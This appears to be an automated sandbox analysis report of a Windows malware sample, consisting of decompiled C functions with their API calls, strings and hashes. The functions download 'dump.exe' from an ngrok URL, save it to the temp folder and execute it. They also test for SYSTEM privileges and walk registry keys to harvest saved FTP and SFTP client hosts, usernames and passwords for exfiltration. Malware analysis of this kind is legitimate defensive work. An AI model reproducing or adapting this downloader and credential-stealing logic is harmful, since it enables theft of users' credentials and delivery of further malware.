Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Global$D83240LocalWirelstrlen$AllocCloseEnumFreeOpen
String ID: DisplayName$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
API String ID: 3111079941-981893429
Opcode ID: 10598e04fb56fc1a18f9fced754db3a550e9482cf9d95f37a8c67be40503c877
Instruction ID: e8800f7e17a62db29e95db71b44d800467aa85f06a3210c5d1cd602f7ee17b8c
Opcode Fuzzy Hash: 10598e04fb56fc1a18f9fced754db3a550e9482cf9d95f37a8c67be40503c877
Instruction Fuzzy Hash: 54614A35900168BADF31AB61CD46FE97679EB44308F1040FAB588B11E1D7F89ED4AE68

Uniqueness

Uniqueness Score: -1.00%

Function 0040FE88, Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 118
stringCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E0040FE88(void* __ebx, void* __ecx) {
				void* _t33;
				long _t49;
				char* _t60;
				void* _t62;
				void* _t67;
				void* _t68;
				void* _t69;
				intOrPtr* _t71;
				intOrPtr _t74;
				void* _t75;
				void* _t77;

				_t69 = __ecx;
				_t68 = __ebx;
				_t71 = "http://63e2e5290bcf.ngrok.io/dump.exe";
				if( *_t71 == 0) {
					L18:
					return 0;
				} else {
					goto L1;
				}
				do {
					L1:
					_t33 = E00403D6D(_t71, _t75 - 0x10c); // executed
					if(_t33 != 0 &&  *((intOrPtr*)(_t75 - 0x10c)) != 0) {
						_t36 = E00401788(_t69, _t71,  *((intOrPtr*)(_t75 - 0x10c)), _t75 - 0x158);
						_t74 = 0;
						 *((intOrPtr*)(_t75 - 0x15c)) = 0;
						while(1) {
							_t82 = _t74 - 0x10;
							if(_t74 >= 0x10) {
								break;
							}
							wsprintfA(_t75 - 0x13e, "%02X",  *[ss:esi+ebp-0x158] & 0x000000ff);
							_t77 = _t77 + 0xc;
							 *((intOrPtr*)(_t75 - 0x15c)) = E00401E4C(_t75 - 0x13e,  *((intOrPtr*)(_t75 - 0x15c)), _t75 - 0x13e);
							_t74 = _t74 + 1;
							__eflags = _t74;
						}
						_push( *((intOrPtr*)(_t75 - 0x10c)));
						E004012BB(_t36, _t82);
						 *(_t75 - 0x148) = 0;
						if(E00401133(_t75 - 0x148, _t82,  *((intOrPtr*)(_t75 - 0x10c)), _t75 - 0x148, 2) != 0 &&  *(_t75 - 0x148) == 0x5a4d) {
							_t49 = GetTempPathA(0x104, _t75 - 0x105);
							if(_t49 != 0 && _t49 <= 0x104) {
								wsprintfA(_t75 - 0x13e, "%d.exe", GetTickCount());
								_t77 = _t77 + 0xc;
								CreateDirectoryA(_t75 - 0x105, 0);
								if(E004025A9(_t75 - 0x105) != 0) {
									_t60 = E00401DF8(_t75 - 0x105, _t75 - 0x105, _t75 - 0x13e);
								} else {
									_t67 = E00401DF8(_t75 - 0x105, _t75 - 0x105, "\\");
									_t70 = _t75 - 0x13e;
									_t60 = E00401E4C(_t67, _t67, _t75 - 0x13e);
								}
								 *(_t75 - 0x144) = _t60;
								_t62 = E00401463(_t60,  *((intOrPtr*)(_t75 - 0x10c)),  *(_t75 - 0x144));
								_t88 = _t62;
								if(_t62 != 0) {
									_push("true");
									L0041066A();
									E004026DD( *((intOrPtr*)(_t75 - 0x15c)), "true", _t62);
									ShellExecuteA(0, "open",  *(_t75 - 0x144), 0, 0, 1);
								}
								E004018B8( *(_t75 - 0x144));
							}
						}
						E00401021(E004018B8( *((intOrPtr*)(_t75 - 0x15c))), _t68, _t69, _t70, _t88,  *((intOrPtr*)(_t75 - 0x10c)));
					}
					asm("cld");
					_t69 = 0xffffffff;
					asm("repne scasb");
				} while ( *_t71 != 0);
				goto L18;
			}

0x0040fe88
0x0040fe88
0x0040fe88
0x0040fe90
0x00410061
0x00410064
0x00000000
0x00000000
0x00000000
0x0040fe96
0x0040fe96
0x0040fe9e
0x0040fea5
0x0040fec5
0x0040feca
0x0040fecc
0x0040ff0b
0x0040ff0b
0x0040ff0e
0x00000000
0x00000000
0x0040feea
0x0040feef
0x0040ff04
0x0040ff0a
0x0040ff0a
0x0040ff0a
0x0040ff10
0x0040ff16
0x0040ff1b
0x0040ff3b
0x0040ff62
0x0040ff64
0x0040ff87
0x0040ff8c
0x0040ff98
0x0040ffab
0x0040ffdb
0x0040ffad
0x0040ffb9
0x0040ffbe
0x0040ffc6
0x0040ffc6
0x0040ffe0
0x0040fff7
0x0040fff7
0x0040fff9
0x0040fffb
0x00410000
0x00410011
0x00410029
0x00410029
0x00410034
0x00410034
0x0040ff64
0x0041004a
0x0041004a
0x0041004f
0x00410052
0x00410057
0x00410059
0x00000000

APIs

Part of subcall function 00401788: 73D83240.OLE32(?,?), ref: 00401795
Part of subcall function 00401788: GlobalFix.KERNEL32 ref: 004017AC
Part of subcall function 00401788: GlobalUnWire.KERNEL32 ref: 004017C4

wsprintfA.USER32 ref: 0040FEEA
GetTempPathA.KERNEL32(00000104,?,00000000,00000000,00000002), ref: 0040FF5D
GetTickCount.KERNEL32 ref: 0040FF75
wsprintfA.USER32 ref: 0040FF87
CreateDirectoryA.KERNEL32(?,00000000), ref: 0040FF98
lstrlen.KERNEL32(true,?,00000000), ref: 00410000
ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00410029

Part of subcall function 00401DF8: lstrlen.KERNEL32(?), ref: 00401E19
Part of subcall function 00401DF8: lstrlen.KERNEL32(00000000,?), ref: 00401E23
Part of subcall function 00401DF8: lstrcpy.KERNEL32(00000000,?), ref: 00401E37
Part of subcall function 00401DF8: lstrcat.KERNEL32(00000000,00000000), ref: 00401E40

Strings

%d.exe, xrefs: 0040FF7B
http://63e2e5290bcf.ngrok.io/dump.exe, xrefs: 0040FE88, 0040FE9D
%02X, xrefs: 0040FEDE
true, xrefs: 0040FFFB, 00410006
open, xrefs: 00410022
MZ, xrefs: 0040FF41

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: lstrlen$Globalwsprintf$CountCreateD83240DirectoryExecutePathShellTempTickWirelstrcatlstrcpy
String ID: %02X$%d.exe$MZ$http://63e2e5290bcf.ngrok.io/dump.exe$open$true
API String ID: 2225561190-3423104401
Opcode ID: 18fa840397a6bd639d7effc39f4ed322254c593d09766e6dac00e365be76457a
Instruction ID: 798d6633d1dddfa29f699b8c5659430589b66450ff5dd2e29decf7e633b954bc
Opcode Fuzzy Hash: 18fa840397a6bd639d7effc39f4ed322254c593d09766e6dac00e365be76457a
Instruction Fuzzy Hash: 93417B71900228AADB30AB61DC46FEEBBB99B05305F1005FBB548B11E1D6F84FC49F58

Uniqueness

Uniqueness Score: -1.00%

Function 00402C01, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00402C01(int* __eax, void* __eflags) {
				void* _v32;
				long _v36;
				void* _v40;
				void* _v44;
				int _t23;
				int _t27;
				long _t30;
				int _t33;
				int _t39;
				void* _t42;
				int _t44;

				_push(_t42);
				_push(0x402c16);
				asm("clc");
				if(__eflags < 0) {
					 *((intOrPtr*)(_t42 + 0x414b273d)) =  *((intOrPtr*)(_t42 + 0x414b273d)) + 1;
					 *__eax = __eax +  *__eax;
					__eflags =  *__eax;
					if( *__eax == 0) {
						L5:
						__eflags = 0;
						return 0;
					} else {
						__eflags =  *0x414b2f;
						if( *0x414b2f == 0) {
							goto L5;
						} else {
							__eflags =  *0x414b33;
							if( *0x414b33 != 0) {
								_t44 = 0;
								_t23 = OpenProcessToken(GetCurrentProcess(), 8,  &_v32);
								__eflags = _t23;
								if(_t23 != 0) {
									_v36 = 0;
									_t27 = GetTokenInformation(_v32, 1, 0, 0,  &_v36); // executed
									__eflags = _t27;
									if(_t27 == 0) {
										_t30 = GetLastError();
										__eflags = _t30 - 0x7a;
										if(_t30 == 0x7a) {
											__eflags = _v36;
											if(_v36 != 0) {
												_v40 = E004018CF(_v36);
												_t33 = GetTokenInformation(_v32, 1, _v40, _v36,  &_v36); // executed
												__eflags = _t33;
												if(_t33 != 0) {
													_t39 =  *0x414b33( *_v40,  &_v44);
													__eflags = _t39;
													if(_t39 != 0) {
														_push("S-1-5-18");
														_push(_v44);
														L004106EE(); // executed
														__eflags = _t39;
														if(_t39 == 0) {
															_t44 = 1;
															__eflags = 1;
														}
														LocalFree(_v44);
													}
												}
												E004018B8(_v40);
											}
										}
									}
									CloseHandle(_v32);
								}
								return _t44;
							} else {
								goto L5;
							}
						}
					}
				} else {
					return __eax;
				}
			}

0x00402c07
0x00402c0c
0x00402c11
0x00402c12
0x00402c15
0x00402c1b
0x00402c1b
0x00402c1d
0x00402c31
0x00402c31
0x00402c35
0x00402c1f
0x00402c1f
0x00402c26
0x00000000
0x00402c28
0x00402c28
0x00402c2f
0x00402c36
0x00402c44
0x00402c4a
0x00402c4c
0x00402c52
0x00402c66
0x00402c6c
0x00402c6e
0x00402c70
0x00402c75
0x00402c78
0x00402c7a
0x00402c7e
0x00402c88
0x00402c9a
0x00402ca0
0x00402ca2
0x00402cb4
0x00402cb4
0x00402cb6
0x00402cb8
0x00402cbd
0x00402cc0
0x00402cc5
0x00402cc7
0x00402cc9
0x00402cc9
0x00402cc9
0x00402ccd
0x00402ccd
0x00402cb6
0x00402cd5
0x00402cd5
0x00402c7e
0x00402c78
0x00402cdd
0x00402cdd
0x00402ce6
0x00000000
0x00000000
0x00000000
0x00402c2f
0x00402c26
0x00402c14
0x00402c14
0x00402c14

Strings

S-1-5-18, xrefs: 00402CB8

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: S-1-5-18
API String ID: 0-4289277601
Opcode ID: 4a84131fbb3f3b34224ab88780312d29f07026fa39a302875d86bd3040619a2f
Instruction ID: d6a68a7a6fba872fbc8a204bfee8a5bac27731b7f04a2bc92072417478d2585c
Opcode Fuzzy Hash: 4a84131fbb3f3b34224ab88780312d29f07026fa39a302875d86bd3040619a2f
Instruction Fuzzy Hash: 69216230908209BFEF119BA0DD4ABEE7B79FB40305F104576A500B51E1D7F99A90DB1C

Uniqueness

Uniqueness Score: -1.00%

Function 0040668F, Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040668F(void* __ecx, intOrPtr _a4, char* _a8) {
				void* _v8;
				int _v12;
				int _v16;
				char _v2064;
				intOrPtr _v2068;
				intOrPtr _v2072;
				intOrPtr _v2076;
				int* _v2080;
				intOrPtr _v2084;
				intOrPtr _v2088;
				char _v2092;
				int* _v2096;
				char _v2100;
				char _v2104;
				long _t62;
				long _t63;
				long _t66;
				intOrPtr* _t78;
				intOrPtr* _t82;

				_t62 = RegOpenKeyA( *0x414869, _a8,  &_v8); // executed
				_t63 = _t62;
				if(_t63 == 0) {
					_v12 = 0;
					while(1) {
						_v16 = 0x7ff;
						_t66 = RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0);
						_t67 = _t66;
						if(_t66 != 0) {
							break;
						}
						_v2068 = E00401E4C( &_v2064, E00401DF8(_t67, _a8, "\\"),  &_v2064);
						_v2080 = E00401D71( *0x414869, _v2068, "Password",  &_v2104);
						_v2072 = E00401D71( *0x414869, _v2068, "Host", 0);
						_v2076 = E00401D71( *0x414869, _v2068, "Login", 0);
						_v2084 = E00401D71( *0x414869, _v2068, "InitialPath", 0);
						_t78 = E00401D71( *0x414869, _v2068, "Port",  &_v2092);
						if(_t78 == 0 || _v2092 != 4) {
							_v2088 = 0x15;
						} else {
							 *_t24 =  *_t78;
						}
						E004018B8(_t78);
						_t82 = E00401D71( *0x414869, _v2068, "PasswordType",  &_v2100);
						if(_t82 == 0 || _v2100 != 4) {
							_v2096 = 0;
						} else {
							 *_t29 =  *_t82;
						}
						E004018B8(_t82);
						if(_v2080 != 0 && _v2096 == 2 && (E004043DC(_v2080,  &_v2104, 0) == 0 || _v2104 == 0)) {
							E004018B8(_v2080);
							_v2080 = 0;
						}
						if(_v2080 != 0 && _v2072 != 0 && _v2076 != 0) {
							E004015CB(E004015CB(E00401569(_a4, 0xbeef0002), _a4, _v2072), _a4, _v2076);
							E0040159F(_a4, _v2080, _v2104);
							E004015CB(E00401569(_a4, _v2088), _a4, _v2084);
						}
						E004018B8(_v2080);
						E004018B8(_v2072);
						E004018B8(_v2076);
						E004018B8(_v2084);
						E004018B8(_v2068);
						_v12 = _v12 + 1;
					}
					return RegCloseKey(_v8);
				}
				return _t63;
			}

0x004066a5
0x004066aa
0x004066ac
0x004066b2
0x004066b9
0x004066b9
0x004066d9
0x004066de
0x004066e0
0x00000000
0x00000000
0x00406703
0x00406726
0x00406744
0x00406762
0x00406780
0x004067a3
0x004067a5
0x004067ba
0x004067b0
0x004067b2
0x004067b2
0x004067c5
0x004067e7
0x004067e9
0x004067fe
0x004067f4
0x004067f6
0x004067f6
0x00406809
0x00406815
0x00406847
0x0040684c
0x0040684c
0x0040685d
0x00406895
0x004068a9
0x004068c5
0x004068c5
0x004068d0
0x004068db
0x004068e6
0x004068f1
0x004068fc
0x00406901
0x00406901
0x00000000
0x0040690c
0x00406912

APIs

RegOpenKeyA.ADVAPI32(?,?), ref: 004066A5
RegEnumKeyExA.ADVAPI32 ref: 004066D9
RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040690C

Strings

Password, xrefs: 00406710
Host, xrefs: 0040672E
Login, xrefs: 0040674C
InitialPath, xrefs: 0040676A
PasswordType, xrefs: 004067D1
Port, xrefs: 0040678D

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: Host$InitialPath$Login$Password$PasswordType$Port
API String ID: 1332880857-4069465341
Opcode ID: 750eeaa563015a51f2f81a185dd3376f511c128af8215887898a7e814ea9f4d0
Instruction ID: ddbf5386c557692e0a2d872b86364cc9d1953b440620d6587ff0ea321d438c9c
Opcode Fuzzy Hash: 750eeaa563015a51f2f81a185dd3376f511c128af8215887898a7e814ea9f4d0
Instruction Fuzzy Hash: 9551E43194011CEADF217B51CC02BED7AB9BF44308F10C5BAA549750B1DB7A5BA5DF88

Uniqueness

Uniqueness Score: -1.00%

Function 0040D072, Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 147
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040D072(void* __ecx, intOrPtr _a4, void* _a8, char* _a12) {
				void* _v8;
				int _v12;
				char _v16;
				int _v20;
				char _v2068;
				intOrPtr _v2072;
				intOrPtr _v2076;
				intOrPtr _v2080;
				intOrPtr _v2084;
				intOrPtr _v2088;
				intOrPtr _v2092;
				char _v2096;
				intOrPtr _v2100;
				long _t68;
				long _t69;
				long _t72;
				intOrPtr* _t84;
				void* _t108;

				_t108 = __ecx;
				_t68 = RegOpenKeyA(_a8, _a12,  &_v8); // executed
				_t69 = _t68;
				if(_t69 == 0) {
					_v12 = 0;
					while(1) {
						_v20 = 0x7ff;
						_t72 = RegEnumKeyExA(_v8, _v12,  &_v2068,  &_v20, 0, 0, 0, 0);
						_t73 = _t72;
						if(_t72 != 0) {
							break;
						}
						_v2072 = E00401DF8( &_v2068, E00401DF8(_t73, _a12, "\\"),  &_v2068);
						E004018B8(_t74);
						_v2092 = E00401D71(_a8, _v2072, "Password",  &_v16);
						_v2076 = E00401D71(_a8, _v2072, "ServerName", 0);
						_v2080 = E00401D71(_a8, _v2072, "UserID", 0);
						_t84 = E00401D71(_a8, _v2072, "PortNumber",  &_v2096);
						if(_t84 == 0 || _v2096 != 4) {
							_t85 = _t84;
							if(_t84 != 0) {
								E004018B8(_t85);
							}
							_v2084 = 0x15;
						} else {
							 *_t27 =  *_t84;
							E004018B8(_t84);
						}
						_v2088 = E00401D71(_a8, _v2072, "InitialDirectory", 0);
						_v2100 = E00401D71(_a8, _v2072, "ServerType", 0);
						if(_v2092 != 0 && E004043DC(_v2092,  &_v16, 0x416859) != 0 && _v16 != 0 && _v2080 != 0 && _v2076 != 0) {
							E004015CB(E004015CB(E00401569(_a4, 0xbeef0010), _a4, _v2076), _a4, _v2080);
							E0040159F(_a4, _v2092, _v16);
							E004015CB(E004015CB(E00401569(_a4, _v2084), _a4, _v2088), _a4, _v2100);
						}
						E004018B8(_v2092);
						E004018B8(_v2076);
						E004018B8(_v2088);
						E004018B8(_v2080);
						E004018B8(_v2100);
						E0040D072(_t108, _a4, _a8, _v2072);
						E004018B8(_v2072);
						_v12 = _v12 + 1;
					}
					return RegCloseKey(_v8);
				}
				return _t69;
			}

0x0040d072
0x0040d085
0x0040d08a
0x0040d08c
0x0040d092
0x0040d099
0x0040d099
0x0040d0b9
0x0040d0be
0x0040d0c0
0x00000000
0x00000000
0x0040d0e4
0x0040d0ea
0x0040d106
0x0040d121
0x0040d13c
0x0040d15c
0x0040d15e
0x0040d179
0x0040d17b
0x0040d17e
0x0040d17e
0x0040d183
0x0040d169
0x0040d16b
0x0040d172
0x0040d172
0x0040d1a2
0x0040d1bd
0x0040d1ca
0x0040d224
0x0040d235
0x0040d25f
0x0040d25f
0x0040d26a
0x0040d275
0x0040d280
0x0040d28b
0x0040d296
0x0040d2a7
0x0040d2b2
0x0040d2b7
0x0040d2b7
0x00000000
0x0040d2c2
0x0040d2c8

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040D085
RegEnumKeyExA.ADVAPI32 ref: 0040D0B9
RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 0040D2C2

Strings

PortNumber, xrefs: 0040D149
InitialDirectory, xrefs: 0040D18F
Password, xrefs: 0040D0F3
ServerType, xrefs: 0040D1AA
ServerName, xrefs: 0040D10E
UserID, xrefs: 0040D129

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: InitialDirectory$Password$PortNumber$ServerName$ServerType$UserID
API String ID: 1332880857-2649023343
Opcode ID: eb9002f98174ec3b628087ee5670cb65f30995989cf3bed41fb77dbe2e33d7e6
Instruction ID: 6c2faa976b9052ac72c52ca6464a050bd4b3273960fb2c20a586784dcbee0562
Opcode Fuzzy Hash: eb9002f98174ec3b628087ee5670cb65f30995989cf3bed41fb77dbe2e33d7e6
Instruction Fuzzy Hash: 6251C831840218BADF216FA1CC02FDD7AB9BF04704F14C1BAB548750B1DB7A9B95AF98

Uniqueness

Uniqueness Score: -1.00%

Function 00407BBA, Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 146
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00407BBA(intOrPtr _a4, void* _a8, char* _a12) {
				void* _v8;
				int _v12;
				int _v16;
				char _v2064;
				intOrPtr _v2068;
				intOrPtr _v2072;
				intOrPtr _v2076;
				intOrPtr _v2080;
				char _v2084;
				intOrPtr _v2088;
				intOrPtr _v2092;
				intOrPtr* _v2096;
				char _v2100;
				long _t66;
				long _t67;
				long _t70;
				intOrPtr* _t82;

				_t66 = RegOpenKeyA(_a8, _a12,  &_v8); // executed
				_t67 = _t66;
				if(_t67 == 0) {
					_v12 = 0;
					while(1) {
						_v16 = 0x7ff;
						_t70 = RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0);
						_t71 = _t70;
						if(_t70 != 0) {
							break;
						}
						_v2068 = E00401DF8( &_v2064, E00401DF8(_t71, _a12, "\\"),  &_v2064);
						E004018B8(_t72);
						_v2080 = E00401D71(_a8, _v2068, "Password", 0);
						_v2072 = E00401D71(_a8, _v2068, "HostName", 0);
						_v2076 = E00401D71(_a8, _v2068, "UserName", 0);
						_v2088 = E00401D71(_a8, _v2068, "RemoteDirectory", 0);
						_t82 = E00401D71( *0x414869, _v2068, "PortNumber",  &_v2084);
						if(_t82 == 0 || _v2084 != 4) {
							_t83 = _t82;
							if(_t82 != 0) {
								E004018B8(_t83);
							}
							_v2092 = 0x15;
						} else {
							 *_t28 =  *_t82;
							E004018B8(_t82);
						}
						_v2096 = E00401D71(_a8, _v2068, "FSProtocol",  &_v2100);
						if(_v2080 != 0 && _v2072 != 0 && _v2076 != 0) {
							E004015CB(E004015CB(E004015CB(E00401569(_a4, 0xbeef0010), _a4, _v2072), _a4, _v2076), _a4, _v2080);
							E004015CB(E00401569(_a4, _v2092), _a4, _v2088);
							if(_v2096 == 0 || _v2100 != 4) {
								E00401569(_a4, 0);
							} else {
								E00401569(_a4,  *_v2096);
							}
						}
						E004018B8(_v2080);
						E004018B8(_v2072);
						E004018B8(_v2076);
						E004018B8(_v2088);
						E004018B8(_v2096);
						E00407BBA(_a4, _a8, _v2068);
						E004018B8(_v2068);
						_v12 = _v12 + 1;
					}
					return RegCloseKey(_v8);
				}
				return _t67;
			}

0x00407bcd
0x00407bd2
0x00407bd4
0x00407bda
0x00407be1
0x00407be1
0x00407c01
0x00407c06
0x00407c08
0x00000000
0x00000000
0x00407c2c
0x00407c32
0x00407c4c
0x00407c67
0x00407c82
0x00407c9d
0x00407cc0
0x00407cc2
0x00407cdd
0x00407cdf
0x00407ce2
0x00407ce2
0x00407ce7
0x00407ccd
0x00407ccf
0x00407cd6
0x00407cd6
0x00407d0b
0x00407d18
0x00407d6a
0x00407d86
0x00407d92
0x00407db4
0x00407d9d
0x00407da8
0x00407da8
0x00407d92
0x00407dbf
0x00407dca
0x00407dd5
0x00407de0
0x00407deb
0x00407dfc
0x00407e07
0x00407e0c
0x00407e0c
0x00000000
0x00407e17
0x00407e1d

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 00407BCD
RegEnumKeyExA.ADVAPI32 ref: 00407C01
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407E17

Strings

Password, xrefs: 00407C39
FSProtocol, xrefs: 00407CF8
PortNumber, xrefs: 00407CAA
HostName, xrefs: 00407C54
RemoteDirectory, xrefs: 00407C8A
UserName, xrefs: 00407C6F

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: FSProtocol$HostName$Password$PortNumber$RemoteDirectory$UserName
API String ID: 1332880857-3874328862
Opcode ID: 5eabcfeb7fba8b38cc39ba326e16b245a28dc186406ab25f81f572592cb6073c
Instruction ID: 1780444ab987c72a7c0881d1e1f70479cbe17c78eae0564416758d360709c296
Opcode Fuzzy Hash: 5eabcfeb7fba8b38cc39ba326e16b245a28dc186406ab25f81f572592cb6073c
Instruction Fuzzy Hash: 7051E131900118FADF226F61CC42BED7AB9BF04344F10C5BAB548750B1DB7A6A91AF99

Uniqueness

Uniqueness Score: -1.00%

Function 0040DC62, Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 133
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040DC62(void* _a4, char* _a8, intOrPtr _a12) {
				void* _v8;
				int _v12;
				int _v16;
				char _v2064;
				intOrPtr _v2068;
				intOrPtr _v2072;
				intOrPtr _v2076;
				intOrPtr _v2080;
				intOrPtr _v2084;
				char _v2088;
				char* _v2092;
				intOrPtr _v2096;
				char _v2100;
				long _t67;
				long _t68;
				long _t71;

				_t67 = RegOpenKeyA(_a4, _a8,  &_v8); // executed
				_t68 = _t67;
				if(_t68 == 0) {
					_v12 = 0;
					while(1) {
						_v16 = 0x7ff;
						_t71 = RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0);
						_t72 = _t71;
						if(_t71 != 0) {
							break;
						}
						_v2092 = E00401DF8( &_v2064, E00401DF8(_t72, _a8, "\\"),  &_v2064);
						E004018B8(_t73);
						_v2068 = E00401D71(_a4, _v2092, "FTP destination server", 0);
						_v2072 = E00401D71(_a4, _v2092, "FTP destination user", 0);
						_v2076 = E00401D71(_a4, _v2092, "FTP destination password", 0);
						_v2080 = E00401D71(_a4, _v2092, "FTP destination port",  &_v2088);
						_v2084 = E00401D71(_a4, _v2092, "FTP destination catalog", 0);
						_v2096 = E00401D71(_a4, _v2092, "FTP profiles",  &_v2100);
						if(_v2068 != 0 && _v2072 != 0 && _v2076 != 0) {
							E004015CB(E004015CB(E004015CB(E00401569(_a12, 0xbeef0000), _a12, _v2068), _a12, _v2072), _a12, _v2076);
							E004015CB(E0040159F(_a12, _v2080, _v2088), _a12, _v2084);
						}
						if(_v2100 != 0) {
							E00401569(_a12, 0xbeef0001);
							E0040159F(_a12, _v2096, _v2100);
						}
						E0040DC62(_a4, _v2092, _a12);
						E004018B8(_v2092);
						E004018B8(_v2068);
						E004018B8(_v2072);
						E004018B8(_v2076);
						E004018B8(_v2080);
						E004018B8(_v2084);
						E004018B8(_v2096);
						_v12 = _v12 + 1;
					}
					return RegCloseKey(_v8);
				}
				return _t68;
			}

0x0040dc75
0x0040dc7a
0x0040dc7c
0x0040dc82
0x0040dc89
0x0040dc89
0x0040dca9
0x0040dcae
0x0040dcb0
0x00000000
0x00000000
0x0040dcd4
0x0040dcda
0x0040dcf4
0x0040dd0f
0x0040dd2a
0x0040dd4a
0x0040dd65
0x0040dd85
0x0040dd92
0x0040ddd8
0x0040ddfa
0x0040ddfa
0x0040de06
0x0040de10
0x0040de24
0x0040de24
0x0040de35
0x0040de40
0x0040de4b
0x0040de56
0x0040de61
0x0040de6c
0x0040de77
0x0040de82
0x0040de87
0x0040de87
0x00000000
0x0040de92
0x0040de98

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040DC75
RegEnumKeyExA.ADVAPI32 ref: 0040DCA9
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040DE92

Strings

FTP destination port, xrefs: 0040DD37
FTP destination user, xrefs: 0040DCFC
FTP destination server, xrefs: 0040DCE1
FTP destination password, xrefs: 0040DD17
FTP destination catalog, xrefs: 0040DD52
FTP profiles, xrefs: 0040DD72

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: FTP destination catalog$FTP destination password$FTP destination port$FTP destination server$FTP destination user$FTP profiles
API String ID: 1332880857-3620412361
Opcode ID: 778cba59ce54c3aa10841a6e53bd8ec573bfc47db50afeda182122a8169569cd
Instruction ID: 9e186bede9d82e05e6d3405ca47770cfa7b4b9f889abd471e1f7745202da50bf
Opcode Fuzzy Hash: 778cba59ce54c3aa10841a6e53bd8ec573bfc47db50afeda182122a8169569cd
Instruction Fuzzy Hash: 32519671850118AADF226F61CC42FDD7ABAFF04304F1085B6B548750B1DF7A9AA5AFC8

Uniqueness

Uniqueness Score: -1.00%

Function 00407F0C, Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 126
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00407F0C(intOrPtr _a4, void* _a8, char* _a12) {
				void* _v8;
				int _v12;
				int _v16;
				char _v2064;
				intOrPtr _v2068;
				intOrPtr _v2072;
				intOrPtr _v2076;
				intOrPtr _v2080;
				char _v2084;
				intOrPtr _v2088;
				intOrPtr _v2092;
				intOrPtr _v2096;
				long _t63;
				long _t64;
				long _t67;

				_t63 = RegOpenKeyA(_a8, _a12,  &_v8); // executed
				_t64 = _t63;
				if(_t64 == 0) {
					_v12 = 0;
					while(1) {
						_v16 = 0x7ff;
						_t67 = RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0);
						_t68 = _t67;
						if(_t67 != 0) {
							break;
						}
						_v2068 = E00401DF8( &_v2064, E00401DF8(_t68, _a12, "\\"),  &_v2064);
						E004018B8(_t69);
						_v2080 = E00401D71(_a8, _v2068, "PassWord",  &_v2084);
